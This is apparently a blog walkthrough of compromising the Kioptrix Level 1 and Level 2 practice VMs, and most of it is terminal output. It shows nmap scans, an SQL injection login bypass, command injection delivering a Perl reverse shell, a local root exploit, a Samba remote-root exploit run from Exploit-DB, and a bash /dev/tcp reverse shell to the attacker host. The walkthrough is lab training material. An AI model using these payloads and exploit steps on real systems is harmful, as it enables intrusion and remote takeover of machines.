|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2018-10-01T18:52:15+00:00; +10h50m06s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:9C:4B:AC (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 - 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Uptime guess: 49.709 days (since Sun Aug 12 22:01:26 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: 10h50m05s, deviation: 0s, median: 10h50m05s

http://123.123.123.101/

The Remote System Administration Login webpage was been tested for SQL injection attacks and it was found out that using 1' or '1' = '1 as the username and password

1' or '1' = '1

After login, we try with command injection:

;perl -e 'use Socket;$i="123.123.123.201";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

root@KaliLNX:/opt/VMs/Kioptrix_Level_2# nc -nlvp 443
listening on [any] 443 ...

connect to [123.123.123.201] from (UNKNOWN) [123.123.123.101] 32770
bash: no job control in this shell
bash-3.00$ bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$

cd /tmp

gcc -Wall -o linux-sendpage 9545.c
bash-3.00$ gcc -Wall -o linux-sendpage 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls -l
total 28
-rw-r--r-- 1 apache apache 9783 Sep 26 04:36 9545.c
-rwxr-xr-x 1 apache apache 6762 Sep 25 21:24 e
-rwxr-xr-x 1 apache apache 6762 Oct 1 15:16 linux-sendpage
bash-3.00$

./linux-sendpage
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#

Kioptrix Level 1

Kioptrix Level 1
root@KaliLNX:~# netdiscover -r 123.123.123.0/24
Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
123.123.123.100 00:0c:29:d5:d9:e9 1 60 VMware,Inc.

nmap -T4 -A -v 123.123.123.100

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: VMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-10-01T21:16:49+00:00; +14h01m47s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:D5:D9:E9 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Mon Oct 1 14:12:01 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros

Let attack: 139/tcp open netbios-ssn Samba smbd (workgroup: VMYGROUP)

/usr/share/exploitdb/platforms/

searchsploit samba |grep 2.2
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution multiple/remote/10.c

cp /usr/share/exploitdb/platforms/multiple/remote/10.c .
gcc 10.c -o samba-2.2.1a-exploit
root@KaliLNX:/opt/VMs/Kioptrix_Level_1# ./samba-exploit
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./samba-exploit [-bBcCdfprsStv] [host]

-b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps (default = 300)
-c connectback ip address
-C max childs for scan/bruteforce mode (default = 40)
-d bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p port to attack (default = 139)
-r return address
-s scan mode (random)
-S scan mode
-t presets (0 for a list)
-v verbose mode

root@KaliLNX:/opt/VMs/Kioptrix_Level_1# ./samba-2.2.1a-exploit -b 0 123.123.123.100
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

* On our Kali:
nc -nlvp 4444

* On our victime shell
bash -i >& /dev/tcp/123.123.123.201/4444 0>&1

* Go back to our Kali:
root@KaliLNX:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [123.123.123.201] from (UNKNOWN) [123.123.123.100] 1025
bash: no job control in this shell
[root@kioptrix tmp]#

[root@kioptrix tmp]#

[root@kioptrix tmp]# pwd
pwd
/tmp
[root@kioptrix tmp]# ls -la
ls -la
total 2
drwxrwxrwt 2 root root 1024 Oct 1 17:29 .
drwxr-xr-x 19 root root 1024 Oct 1 17:13 ..
[root@kioptrix tmp]#

Pages

Monday, January 28, 2019